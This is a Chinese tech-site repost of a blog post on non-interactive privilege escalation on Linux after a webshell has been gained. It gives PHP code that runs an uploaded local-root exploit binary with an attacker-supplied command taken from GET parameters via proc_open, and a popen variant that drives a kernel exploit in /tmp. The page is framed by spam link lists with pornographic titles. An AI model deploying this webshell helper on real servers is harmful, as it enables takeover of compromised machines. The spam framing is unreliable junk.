激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務器之家:專注于服務器技術及軟件下載分享
分類導航

Linux|Centos|Ubuntu|系統進程|Fedora|注冊表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

服務器之家 - 服務器系統 - Linux - Linux下非交互式提權詳解

Linux下非交互式提權詳解

2022-01-04 17:05該隱 Linux

這篇文章主要介紹了Linux下非交互式提權的相關資料,文中介紹的非常詳細,對大家具有一定的參考價值,需要的朋友們下面來一起看看吧。

前言

之前拿到某站的Webshell之后,在提權的時候發現網站不能反彈shell。而且,在滲透的時候經常遇到那種不能反彈shell的,你的提權工具拿上去之后因為沒有交互式的環境,也不知道提權是否成功。因此,寫了一個簡單的工具。需要的朋友們可以參考學習。

方法如下

proce_open()

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// path是提權工具的絕對路徑,例如:/usr/local/htdocs/2.6.18
// cmd是你需要執行的命令,例如:whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
 $path = $_GET['path'];
 $cmd = $_GET['cmd'];
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
 );
 $process = proc_open($path, $descriptorspec, $pipes);
 
 if (is_resource($process)) {
  fwrite($pipes[0],$cmd);
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  echo stream_get_contents($pipes[2]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  $return_value = proc_close($process);
 
}

代碼很簡單,不懂的可以看看PHP手冊,popen()在這里也可以實現相同的效果

另外,有了這個代碼之后,我們以后提權是不是就可以直接把提權工具扔到服務器上面,然后PHP代碼改一改,循環測試哪些提權工具是可用的了。

popen()

這是土司之前一個人發的,代碼原封不動的放在了下面。稍微改一改就能達到上面一樣的效果

?
1
2
3
4
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對服務器之家的支持。

原文鏈接:http://ecma.io/?p=611

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: av免费在线网 | 日本高清黄色片 | 高清视频一区二区 | 久久精品一区二区三区不卡牛牛 | 亚洲第一成人久久网站 | 中文字幕在线视频日本 | 特级a欧美做爰片毛片 | 视频精品二区 | 久久精品一二三区白丝高潮 | 毛片在线免费视频 | 一级空姐毛片 | 亚洲精品永久视频 | 免费久久精品 | 国产无遮挡一区二区三区毛片日本 | 久久久久久久久久久久久久av | sese综合 | 久久最新免费视频 | 在线天堂资源 | 国产91久久久久久 | 久久99精品久久久久久236 | 亚洲成人在线免费 | 国产免费久久久久 | 91网站免费观看 | 中文日韩在线视频 | 成人毛片100免费观看 | 一级毛片手机在线观看 | 4p嗯啊巨肉寝室调教男男视频 | 九九精品在线观看 | 免费黄色在线观看网站 | 最新中文字幕第一页视频 | 国产午夜精品一区二区三区不卡 | 能直接看av的网站 | 国产成人视屏 | 国产va在线观看 | 成人在线免费观看网址 | 国产精品久久久久久久久久久久午夜 | 男女生羞羞视频网站在线观看 | 天堂成人一区二区三区 | 免费的毛片 | 成人短视频在线播放 | 综合成人在线 |